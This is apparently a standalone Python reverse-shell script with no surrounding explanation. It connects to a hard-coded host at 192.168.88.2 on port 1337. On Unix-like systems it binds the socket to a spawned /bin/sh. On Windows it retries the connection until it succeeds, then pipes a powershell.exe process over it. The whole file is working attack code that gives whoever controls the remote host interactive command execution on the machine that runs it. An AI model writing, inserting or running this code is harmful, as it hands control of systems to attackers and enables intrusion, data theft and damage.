| RHOST = "192.168.88.2" |
| RPORT = 1337 |
|
|
| from sys import platform |
|
|
| if platform != 'win32': |
| import threading |
| import socket |
| import pty |
| import os |
|
|
| def connect_and_spawn_shell(): |
| s = socket.socket() |
| s.connect(("192.168.88.2", 1337)) |
| [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)] |
| pty.spawn("/bin/sh") |
|
|
| threading.Thread(target=connect_and_spawn_shell).start() |
| else: |
| import os |
| import socket |
| import subprocess |
| import threading |
| import sys |
|
|
| def send_to_process(s, p): |
| while True: |
| p.stdin.write(s.recv(1024).decode()) |
| p.stdin.flush() |
|
|
| def receive_from_process(s, p): |
| while True: |
| s.send(p.stdout.read(1).encode()) |
|
|
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
|
|
| while True: |
| try: |
| s.connect(("192.168.88.2", 1337)) |
| break |
| except: |
| pass |
|
|
| p = subprocess.Popen(["powershell.exe"], |
| stdout=subprocess.PIPE, |
| stderr=subprocess.STDOUT, |
| stdin=subprocess.PIPE, |
| shell=True, |
| text=True) |
|
|
| threading.Thread(target=send_to_process, args=[s, p], daemon=True).start() |
| threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start() |
| p.wait() |
|
|
